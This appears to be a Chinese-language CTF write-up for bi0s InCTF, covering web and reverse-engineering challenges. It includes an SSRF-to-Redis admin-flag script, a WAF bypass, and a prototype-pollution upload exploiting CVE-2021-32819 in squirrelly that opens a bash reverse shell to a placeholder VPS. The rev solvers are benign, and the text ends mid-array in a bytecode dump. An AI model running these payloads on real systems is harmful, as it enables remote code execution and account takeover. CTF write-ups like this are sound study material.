web
MD Notes
gomarkdown模块在解析代码块的语法时,对于代码类型的标注没有进行实体编码。
故输入以下字符串便可导致xss
保存后,发送给机器人
随后vps监听静候佳音
Raas
import requests
url = "http://web.challenge.bi0s.in:6969/"
userID = "ccc"
data = {"url": "inctf://redis:6379/_%s" % "set " + userID + "_isAdmin yes\r\n"}
requests.post(url, data=data)
res = requests.get(url, cookies={"userID": userID})
print(res.headers["Set-Cookie"])
Json Analyser
waf.py中的ujson模块有解析问题,传入\u0073uperuser","name":"admin即可绕过拿到pin码
app.js中读取上传的package.json设置文件后展示。因为模板使用了旧版本squirrelly模块,存在CVE-2021-32819
此cve需要在模板render时传入{"defaultFilter":"e'); [js code];//"},但原代码中是
res.render('index.squirrelly', {'output':output})
无法直接传入defaultFilter。考虑在读取上传的package.json设置文件时可能存在原型链污染,故上传文件如下:
POST /upload HTTP/1.1
Host: jsonanalyser.challenge.bi0s.in:41897
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4731849084053322511847680923
Content-Length: 1002
Origin: http://jsonanalyser.challenge.bi0s.in:51219
Connection: close
Referer: http://jsonanalyser.challenge.bi0s.in:51219/
Upgrade-Insecure-Requests: 1
-----------------------------4731849084053322511847680923
Content-Disposition: form-data; name="uploadFile"; filename="package.json"
Content-Type: application/octet-stream
{
"constructor":{"prototype":{"defaultFilter":"e')); let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('bash -c \"bash -i >& /dev/tcp/vps-ip/vps-port 0>&1\"'); //"}},
"name": "aaa",
"version": "1.0.0",
"description": "",
"main": "app.js",
"dependencies": {
"config-handler": "^2.0.3",
"express": "^4.17.1",
"express-fileupload": "^1.2.1",
"nodemon": "^2.0.12",
"squirrelly": "^8.0.8"
},
"devDependencies": {},
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"author": "",
"license": "ISC"
}
-----------------------------4731849084053322511847680923
Content-Disposition: form-data; name="pin"
673307-0496-1001122
-----------------------------4731849084053322511847680923--
rev
find_plut0
签到题,直接用angr秒了
import angr
import claripy
from z3 import *
flag = claripy.BVS("flag", 8 * 30)
p = angr.Project("binaries/find_plut0")
base = 0x400000
state = p.factory.blank_state(addr=base + 0xBA0)
state.memory.store(base + 0x202100, flag)
sim = p.factory.simgr(state)
for byte in flag.chop(8):
state.add_constraints(byte >= 32) # ' '
state.add_constraints(byte <= 128) # '~'
def myfind(state):
rip = state.solver.eval(state.regs.rip)
print(hex(rip))
return base + 0xADB == rip
res = sim.explore(find=myfind, avoid=[base + 0xAFD])
print(res.found)
resState = res.found[0]
flag2 = resState.memory.load(base + 0x202100, 30)
print(resState.solver.eval(flag2, cast_to=bytes))
print(resState.solver.eval(flag, cast_to=bytes))
REplica
简单的 rust 逆向
输入由命令行输入,在比较位置下断点提取数据观察即可。
target = '0kedtZ6fYO3aX4lPNMSgQbRwh'
t1 = '0123456789XABCDEFGHIJKLMN'
t2 = 'NMKG98F76JED54LICB32HAX10'
t3 = []
result = [0] * 25
for c in t2:
t3.append(t1.find(c))
for i in range(25):
result[t3[i]] = target[i]
print("".join(result))
miz
简单的 rust 逆向,地图题
#include<iostream>
#include<cstdio>
using namespace std;
const int N=30;
int dx[]={-1,1,0,0};
int dy[]={0,0,-1,1};
char ha[]={'j','k','h','l'};
int a[N][N]={
{1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1},
{1,0,1,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,1,0,1},
{1,0,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,0,1,0,1},
{1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,1},
{1,0,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,0,1,1,1,1,1},
{1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,1},
{1,0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,0,1,1,1,1,1,0,1},
{1,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,1},
{1,1,1,0,1,0,1,0,1,1,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1},
{1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1},
{1,0,1,0,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1},
{1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1},
{1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,0,1,0,1,0,1},
{1,0,0,0,1,0,0,0,1,0,0,0,1,0,1,0,0,0,1,0,0,0,1,0,1},
{1,0,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,0,1},
{1,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1},
{1,0,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,1,1,0,1,1,1,0,1},
{1,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,1,0,1},
{1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,0,1,0,1,0,1,0,1},
{1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1},
{1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,0,1,0,1},
{1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,1},
{1,1,1,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,0,1,0,1,0,1},
{1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1},
{1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1}};
int sx=1,sy=0xD,s[1005],top;
bool v[N][N];
void dfs(int x,int y)
{
// if(y==1&&x==0xc)
// puts("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
if(a[x][y]==2)
{
for(int i=1;i<=top;i++)
printf("%c",ha展开收缩]);
puts("");
// exit(0);
return;
}
for(int i=0;i<4;i++)
if(x+dx[i]>=0&&x+dx[i]<25&&y+dy[i]>=0&&y+dy[i]<25&&!v[x+dx[i]][y+dy[i]]&&a[x+dx[i]][y+dy[i]]!=1)
{
v[x+dx[i]][y+dy[i]]=1;
s[++top]=i;
dfs(x+dx[i],y+dy[i]);
v[x+dx[i]][y+dy[i]]=0;
top--;
}
}
int main()
{
// cout<<a[sx][sy]<<endl;
v[sx][sy]=1;
dfs(sx,sy);
return 0;
}
Adventures of Lonely Knight
模拟器 + 调试器: https://github.com/SourMesen/Mesen/releases
参考链接: https://blog.attify.com/flare-on-6-ctf-writeup-part8/
这道题,思路大概是先找到血量,再下内存断点找到读写血附近的代码。
再分析死亡逻辑,找到关键变量地址 0x68 , 只要该值不为 0 就可以直接通关。
钥匙判断逻辑
FlagChecker
虚拟机逆向,需要编写 decompiler
bytecode = [0x00000006, 0x00000000, 0x0000000B, 0x00000006, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x00000008, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000010, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x00000018, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000006, 0x0000001F, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000004, 0x00000009, 0x00000003, 0x0000008C, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000001, 0x0000000B, 0x00000002, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x00000009, 0x0000000B, 0x00000006, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000011, 0x0000000B, 0x00000001, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x00000019, 0x0000000B, 0x00000000, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000009, 0x00000003, 0x000000E1, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000002, 0x0000000B, 0x00000000, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000A, 0x0000000B, 0x00000004, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000012, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x0000001A, 0x0000000B, 0x00000002, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000006, 0x00000020, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000004, 0x00000009, 0x00000003, 0x0000012B, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000003, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000B, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000013, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x0000001B, 0x0000000B, 0x00000007, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000009, 0x00000003, 0x00000167, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 